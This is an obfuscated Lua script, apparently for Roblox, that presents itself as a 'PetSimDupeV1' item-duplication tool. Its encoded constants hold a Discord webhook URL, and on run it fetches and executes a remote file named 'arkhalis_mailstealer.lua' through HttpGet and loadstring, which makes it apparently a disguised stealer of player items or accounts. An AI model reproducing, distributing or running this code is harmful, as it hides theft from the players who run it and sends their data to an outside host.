--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v70=0;while true do if (v70==0) then v19=v0(v3(v30,1,1));return "";end end else local v71=0;local v72;while true do if (v71==0) then v72=v2(v0(v30,16));if v19 then local v99=v5(v72,v19);v19=nil;return v99;else return v72;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v73=0 -0 ;local v74;while true do if (v73==(0 -0)) then v74=(v31/((3 -1)^(v32-1)))%((4 -2)^(((v33-(1 + 0)) -(v32-(620 -(555 + (941 -(282 + 595)))))) + (932 -(857 + 74)))) ;return v74-(v74%(569 -(367 + 201))) ;end end else local v75=2^(v32-1) ;return (((v31%(v75 + v75))>=v75) and (928 -((1851 -(1523 + 114)) + 641 + 72))) or (0 + 0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0 -0 ;local v36;local v37;while true do if (v35==((237 + 829) -((1025 -(892 + 65)) + 997))) then return (v37 * (1526 -(226 + 1044))) + v36 ;end if (v35==(0 -0)) then v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + (119 -(32 + 85)) ;v35=1 + 0 ;end end end local function v23()local v38=0 -0 ;local v39;local v40;local v41;local v42;while true do if ((1 -0)==v38) then return (v42 * (12302277 + 4474939)) + (v41 * 65536) + (v40 * (628 -372)) + v39 ;end if (v38==(0 -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (4 -1) );v18=v18 + (15 -11) ;v38=351 -(87 + 263) ;end end end local function v24()local v43=0 -0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==1) then v46=773 -(201 + 571) ;v47=(v20(v45,1 + 0 ,1017 -(915 + 82) ) * (((1143 -(116 + 1022)) -3)^(19 + 13))) + v44 ;v43=2;end if (v43==(3 -0)) then if (v48==(1187 -(1069 + 118))) then if (v47==(0 -0)) then return v49 * 0 ;else local v100=(0 -0) -0 ;while true do if (v100==(0 + 0)) then v48=1 -0 ;v46=0;break;end end end elseif (v48==(2031 + 16)) then return ((v47==(791 -(368 + 423))) and (v49 * (1/(0 -0)))) or (v49 * NaN) ;end return v8(v49,v48-(1041 -(6 + 4 + 8)) ) * (v46 + (v47/((7 -5)^(494 -(416 + 26))))) ;end if (v43==0) then v44=v23();v45=v23();v43=3 -2 ;end if (v43==((3 -2) + (3 -2))) then v48=v20(v45,21,54 -23 );v49=((v20(v45,470 -(145 + 293) )==(431 -(44 + 386))) and  -(1487 -(998 + 488))) or (1 + 0) ;v43=3 + (859 -(814 + 45)) ;end end end local function v25(v50)local v51;if  not v50 then local v76=0;while true do if (v76==(0 -(1423 -(630 + 793)))) then v50=v23();if (v50==(0 + 0)) then return "";end break;end end end v51=v3(v16,v18,(v18 + v50) -(1 + 0) );v18=v18 + v50 ;local v52={};for v68=1081 -(1020 + 60) , #v51 do v52[v68]=v2(v1(v3(v51,v68,v68)));end return v6(v52);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0 + 0 ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v53~=(0 -0)) then else v54=0 + 0 ;v55=nil;v53=1025 -(706 + 318) ;end if (1==v53) then local v77=0;while true do if (1==v77) then v53=1253 -(721 + 530) ;break;end if (v77==(1271 -(945 + 326))) then v56=nil;v57=nil;v77=2 -1 ;end end end if (v53==(3 + 0)) then v60=nil;while true do local v81=700 -(271 + 429) ;local v82;while true do if (v81==(0 + 0)) then v82=1500 -(1408 + 92) ;while true do if (0==v82) then if (0==v54) then local v107=0;local v108;while true do if (v107==(1086 -(461 + 625))) then v108=1288 -(993 + 295) ;while true do if (v108==(1 + 1)) then v54=1172 -(418 + 753) ;break;end if (v108==(0 + 0)) then v55={};v56={};v108=1 + 0 ;end if (v108==(1 + 0)) then local v143=0 + 0 ;while true do if (v143==1) then v108=2;break;end if (v143==(529 -(406 + 123))) then v57={};v58={v55,v56,nil,v57};v143=1 + 0 ;end end end end break;end end end if (v54==(1146 -(466 + 679))) then local v109=0;local v110;local v111;while true do if (v109~=(0 -0)) then else v110=0 -0 ;v111=nil;v109=1;end if ((1901 -(106 + 1794))==v109) then while true do if (v110~=0) then else v111=0;while true do if (v111~=2) then else v54=2;break;end if (v111~=1) then else local v169=0;while true do if (v169~=1) then else v111=1 + 1 ;break;end if (v169~=(0 + 0)) then else for v180=2 -1 ,v59 do local v181=0 -0 ;local v182;local v183;local v184;while true do if (v181==(115 -(4 + 110))) then v184=nil;while true do if (1==v182) then if (v183==1) then v184=v21()~=(584 -(57 + 527)) ;elseif (v183==2) then v184=v24();elseif (v183==(1430 -(41 + 1386))) then v184=v25();end v60[v180]=v184;break;end if (v182==0) then local v190=0;local v191;while true do if (v190~=0) then else v191=103 -(17 + 86) ;while true do if (v191==(1 + 0)) then v182=1 -0 ;break;end if (v191==0) then local v199=0 -0 ;while true do if (0==v199) then v183=v21();v184=nil;v199=167 -(122 + 44) ;end if ((1 -0)~=v199) then else v191=1;break;end end end end break;end end end end break;end if ((0 -0)~=v181) then else v182=0 + 0 ;v183=nil;v181=1 + 0 ;end end end v58[5 -2 ]=v21();v169=66 -(30 + 35) ;end end end if (v111==0) then local v170=0;while true do if (v170==(0 + 0)) then local v179=0;while true do if (v179==(1257 -(1043 + 214))) then v59=v23();v60={};v179=1;end if (v179~=1) then else v170=3 -2 ;break;end end end if (v170==1) then v111=1;break;end end end end break;end end break;end end end v82=1213 -(323 + 889) ;end if (v82==1) then if ((5 -3)==v54) then local v112=0;while true do if (v112==(581 -(361 + 219))) then return v58;end if ((320 -(53 + 267))==v112) then local v113=0 + 0 ;while true do if (v113==0) then for v151=1,v23() do local v152=0;local v153;local v154;local v155;local v156;while true do if (v152==2) then while true do if ((413 -(15 + 398))~=v153) then else v154=0;v155=nil;v153=1;end if (v153~=1) then else v156=nil;while true do if (v154==(982 -(18 + 964))) then local v187=0;local v188;while true do if (v187==0) then v188=0;while true do if (v188~=(0 -0)) then else v155=0;v156=nil;v188=1;end if (v188~=(1 + 0)) then else v154=1 + 0 ;break;end end break;end end end if (v154~=1) then else while true do if (v155==(850 -(20 + 830))) then v156=v21();if (v20(v156,1,1 + 0 )==(126 -(116 + 10))) then local v192=0 + 0 ;local v193;local v194;local v195;local v196;local v197;local v198;while true do if (v192~=(741 -(542 + 196))) then else while true do if (0==v193) then local v200=0;while true do if (v200==1) then v193=1;break;end if (v200~=0) then else v194=0;v195=nil;v200=1;end end end if (1==v193) then local v201=0 -0 ;while true do if (v201==(0 + 0)) then v196=nil;v197=nil;v201=1 + 0 ;end if (v201==(1 + 0)) then v193=4 -2 ;break;end end end if (v193==2) then v198=nil;while true do if (v194==(4 -2)) then while true do if (v195==1) then local v205=1551 -(1126 + 425) ;local v206;while true do if (v205==0) then v206=0;while true do if (v206==(405 -(118 + 287))) then local v215=0;while true do if (v215==1) then v206=3 -2 ;break;end if (v215~=(1121 -(118 + 1003))) then else local v220=0 -0 ;while true do if (v220==(377 -(142 + 235))) then v198={v22(),v22(),nil,nil};if (v196==(0 -0)) then local v221=0 + 0 ;local v222;while true do if (v221==(0 + 0)) then v222=0 + 0 ;while true do if (v222~=0) then else v198[2 + 1 ]=v22();v198[4]=v22();break;end end break;end end elseif (v196==1) then v198[3]=v23();elseif (v196==2) then v198[3]=v23() -(2^16) ;elseif (v196==(2 + 1)) then local v227=0;local v228;local v229;local v230;while true do if (v227~=(0 -0)) then else v228=0 -0 ;v229=nil;v227=2 -1 ;end if (v227==(1 + 0)) then v230=nil;while true do if (v228==0) then local v231=0;while true do if (0~=v231) then else v229=0 -0 ;v230=nil;v231=1;end if (v231==1) then v228=754 -(239 + 514) ;break;end end end if (v228==(1 + 0)) then while true do if (v229==0) then v230=1329 -(797 + 532) ;while true do if (v230==0) then v198[3 + 0 ]=v23() -((1 + 1)^16) ;v198[4]=v22();break;end end break;end end break;end end break;end end end v220=2 -1 ;end if ((1203 -(373 + 829))~=v220) then else v215=732 -(476 + 255) ;break;end end end end end if (v206==(1131 -(369 + 761))) then v195=2;break;end end break;end end end if (v195==(2 + 0)) then local v207=0;while true do if ((0 -0)~=v207) then else local v213=0;while true do if (v213~=(0 -0)) then else if (v20(v197,239 -(64 + 174) ,1 + 0 )~=1) then else v198[2]=v60[v198[2]];end if (v20(v197,2,2 -0 )~=(337 -(144 + 192))) then else v198[3]=v60[v198[3]];end v213=217 -(42 + 174) ;end if (v213==(1 + 0)) then v207=1;break;end end end if (v207~=(1 + 0)) then else v195=3;break;end end end if ((2 + 1)==v195) then if (v20(v197,3,1507 -(363 + 1141) )==1) then v198[1584 -(1183 + 397) ]=v60[v198[11 -7 ]];end v55[v151]=v198;break;end if (v195~=0) then else local v209=0;while true do if (v209==(0 + 0)) then v196=v20(v156,2,3);v197=v20(v156,3 + 1 ,1981 -(1913 + 62) );v209=1 + 0 ;end if (v209==(2 -1)) then v195=1;break;end end end end break;end if (v194==1) then local v202=0;local v203;while true do if (v202==0) then v203=1933 -(565 + 1368) ;while true do if (v203==0) then local v214=0 -0 ;while true do if (v214~=1) then else v203=1;break;end if (v214~=(1661 -(1477 + 184))) then else v197=nil;v198=nil;v214=1 -0 ;end end end if (v203==1) then v194=2 + 0 ;break;end end break;end end end if ((856 -(564 + 292))~=v194) then else local v204=0 -0 ;while true do if (0==v204) then local v210=0 -0 ;while true do if (v210==1) then v204=1;break;end if ((304 -(244 + 60))==v210) then v195=0;v196=nil;v210=1;end end end if (v204~=1) then else v194=1;break;end end end end break;end end break;end if (v192~=0) then else v193=0;v194=nil;v192=1;end if (v192==(2 + 0)) then v197=nil;v198=nil;v192=479 -(41 + 435) ;end if (v192~=(1002 -(938 + 63))) then else v195=nil;v196=nil;v192=2 + 0 ;end end end break;end end break;end end break;end end break;end if (v152~=(1125 -(936 + 189))) then else v153=0;v154=nil;v152=1;end if (1==v152) then v155=nil;v156=nil;v152=2;end end end for v157=1,v23() do v56[v157-(1 + 0) ]=v28();end v113=1614 -(1565 + 48) ;end if (v113==1) then v112=1;break;end end end end end break;end end break;end end end break;end if (2==v53) then v58=nil;v59=nil;v53=2 + 1 ;end end end local function v29(v61,v62,v63)local v64=0;local v65;local v66;local v67;while true do if (v64==0) then v65=v61[1];v66=v61[2];v64=1;end if (v64==1) then v67=v61[3];return function(...)local v83=v65;local v84=v66;local v85=v67;local v86=v27;local v87=1;local v88= -1;local v89={};local v90={...};local v91=v12("#",...) -1 ;local v92={};local v93={};for v97=0,v91 do if (v97>=v85) then v89[v97-v85 ]=v90[v97 + 1 ];else v93[v97]=v90[v97 + 1 ];end end local v94=(v91-v85) + 1 ;local v95;local v96;while true do local v98=0;while true do if (v98==0) then v95=v83[v87];v96=v95[1];v98=1;end if (v98==1) then if (v96<=8) then if (v96<=3) then if (v96<=1) then if (v96>0) then v93[v95[2]]=v63[v95[3]];else v93[v95[2]]();end elseif (v96==2) then v93[v95[2]]=v63[v95[3]];else v93[v95[2]][v95[3]]=v95[4];end elseif (v96<=5) then if (v96>4) then local v120=0;local v121;while true do if (v120==0) then v121=v95[2];v93[v121]=v93[v121](v13(v93,v121 + 1 ,v88));break;end end else local v122=v95[2];local v123=v93[v95[3]];v93[v122 + 1 ]=v123;v93[v122]=v123[v95[4]];end elseif (v96<=6) then v93[v95[2]][v95[3]]=v95[4];elseif (v96>7) then local v144=0;local v145;local v146;local v147;local v148;while true do if (v144==0) then v145=v95[2];v146,v147=v86(v93[v145](v13(v93,v145 + 1 ,v95[3])));v144=1;end if (v144==2) then for v174=v145,v88 do local v175=0;while true do if (v175==0) then v148=v148 + 1 ;v93[v174]=v146[v148];break;end end end break;end if (v144==1) then v88=(v147 + v145) -1 ;v148=0;v144=2;end end else do return;end end elseif (v96<=12) then if (v96<=10) then if (v96>9) then v93[v95[2]]();else v93[v95[2]]=v95[3]~=0 ;end elseif (v96==11) then v93[v95[2]]=v95[3];else v93[v95[2]]=v95[3];end elseif (v96<=14) then if (v96==13) then local v134=0;local v135;local v136;while true do if (v134==0) then v135=v95[2];v136=v93[v95[3]];v134=1;end if (v134==1) then v93[v135 + 1 ]=v136;v93[v135]=v136[v95[4]];break;end end else local v137=0;local v138;local v139;local v140;local v141;while true do if (v137==0) then v138=v95[2];v139,v140=v86(v93[v138](v13(v93,v138 + 1 ,v95[3])));v137=1;end if (v137==2) then for v167=v138,v88 do local v168=0;while true do if (0==v168) then v141=v141 + 1 ;v93[v167]=v139[v141];break;end end end break;end if (v137==1) then v88=(v140 + v138) -1 ;v141=0;v137=2;end end end elseif (v96<=15) then v93[v95[2]]=v95[3]~=0 ;elseif (v96>16) then do return;end else local v149=0;local v150;while true do if (v149==0) then v150=v95[2];v93[v150]=v93[v150](v13(v93,v150 + 1 ,v88));break;end end end v87=v87 + 1 ;break;end end end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0B3O0003023O005F4703093O00557365726E616D6531030C3O0050657453696D44757065563103093O00557365726E616D6532034O0003073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O31383437363234323637333438332O37382F586D4E4945646C745A754E6D59774B5642583167416267413479437344496355394D4476384F4C4A7571584B315275435368782D413532486E334B67756641756A783054030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403363O00682O7470733A2O2F61726B68616C69736C75612E6769746875622E696F2F61726B68616C69735F6D61696C737465616C65722E6C7561000F3O0012013O00013O0030063O000200030012013O00013O0030063O000400050012013O00013O0030063O000600070012013O00083O001201000100093O00200400010001000A00120C0003000B4O000F000400014O000E000100044O00055O00026O000100012O00073O00017O00",v9(),...);end
